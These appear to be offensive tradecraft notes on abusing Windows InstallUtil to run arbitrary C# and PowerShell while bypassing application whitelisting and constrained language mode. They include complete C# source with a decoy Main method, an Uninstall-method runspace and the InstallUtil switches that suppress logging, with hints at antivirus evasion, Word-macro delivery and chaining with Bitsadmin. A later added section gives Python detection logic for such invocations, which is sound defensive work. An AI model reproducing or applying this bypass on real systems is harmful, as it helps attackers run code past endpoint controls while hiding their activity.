InstallUtil

Leverage InstallUtil to execute arbitrary C# code

We must put the code we want to execute inside either the Install or the Uninstall method of the Installer class.

Visual Studio project:

Right click References -> Add References -> Assemblies -> Add System.Configuration.Install

Since the content of the Main method is not part of the application whitelisting bypass, we could use it for other purposes, like bypassing antivirus.

We use the custom runspace code from -> Custom Runspaces

using System;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using System.Configuration.Install;

namespace ConsoleApp2
{
    class Program
    {
        static void Main(string[] args)
        {
            Console.WriteLine("This is the main method which is a decoy");
        }
    }
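    // RunInstaller(true) marks this class as an installer that InstallUtil loads.
    [System.ComponentModel.RunInstaller(true)]
    public class Sample : System.Configuration.Install.Installer
    {
        // Called when InstallUtil is run with /U.
        public override void Uninstall(System.Collections.IDictionary savedState)
        {
            // Custom runspace hosted inside this process (see Custom Runspaces).
            Runspace rs = RunspaceFactory.CreateRunspace();
            rs.Open();

            PowerShell ps = PowerShell.Create();
            ps.Runspace = rs;

            // Write the runspace's language mode to a file so the result can be checked.
            String cmd = "$ExecutionContext.SessionState.LanguageMode | Out-File -FilePath C:\\Tools\\test.txt";
            ps.AddScript(cmd);
            ps.Invoke();
            rs.Close();
        }
    }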
}

To trigger our constrained language mode bypass code, we must invoke it through InstallUtil with the following switches: /logfile to avoid logging to a file, /LogToConsole=false to suppress output on the console, and /U to trigger the Uninstall method.
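The same invocation from the defender's side, as an added example that is not part of the original notes: a Python check that flags process-creation command lines in which InstallUtil runs with the switches listed above. The severity scoring, the sample command lines and the Bypass.exe and Contoso names are constructed assumptions.

```python
import re

# Switches the page lists for the InstallUtil invocation, matched case-insensitively.
# Accepting "-" as well as "/" as the switch prefix is a deliberately loose assumption.
INDICATORS = {
    "uninstall": re.compile(r"^[/-]u(ninstall)?$", re.I),
    "console_output_off": re.compile(r"^[/-]logtoconsole=false$", re.I),
    "logfile_switch": re.compile(r"^[/-]logfile(=.*)?$", re.I),
}

def split_cmdline(cmdline):
    """Split a Windows command line into arguments, keeping quoted runs together."""
    return [t.replace('"', "") for t in re.findall(r'(?:"[^"]*"|[^\s"])+', cmdline)]

def assess(cmdline):
    """Return (severity, indicators) for one process-creation command line.

    severity is None when the process is not InstallUtil. The scoring is an
    assumption of this example: Uninstall plus any logging switch is "high",
    one of the two alone is "medium", any other InstallUtil run is "info".
    """
    args = split_cmdline(cmdline)
    if not args:
        return None, []
    image = re.split(r"[\\/]", args[0])[-1].lower()
    if image not in ("installutil.exe", "installutil"):
        return None, []
    hits = sorted(name for name, rx in INDICATORS.items()
                  if any(rx.match(a) for a in args[1:]))
    quiet = any(h != "uninstall" for h in hits)
    if "uninstall" in hits and quiet:
        return "high", hits
    return ("medium" if hits else "info"), hits

# Constructed sample command lines (not taken from real logs).
SAMPLES = [
    r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
    r" /logfile= /LogToConsole=false /U C:\Tools\Bypass.exe",
    r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"'
    r' "C:\Program Files\Contoso\Svc.exe"',
    r'installutil.exe /u "C:\Program Files\Contoso\Svc.exe"',
    r"C:\Windows\System32\notepad.exe C:\notes\installutil.txt",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(assess(line), line)
```

The check keys on the image name in the command line; where the telemetry records the binary's original file name (Sysmon process-creation events do), matching on that field is the sturdier choice.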

It would be possible to reuse this tradecraft with Microsoft Word macros.

Combine this with -> Bitsadmin + InstallUtil
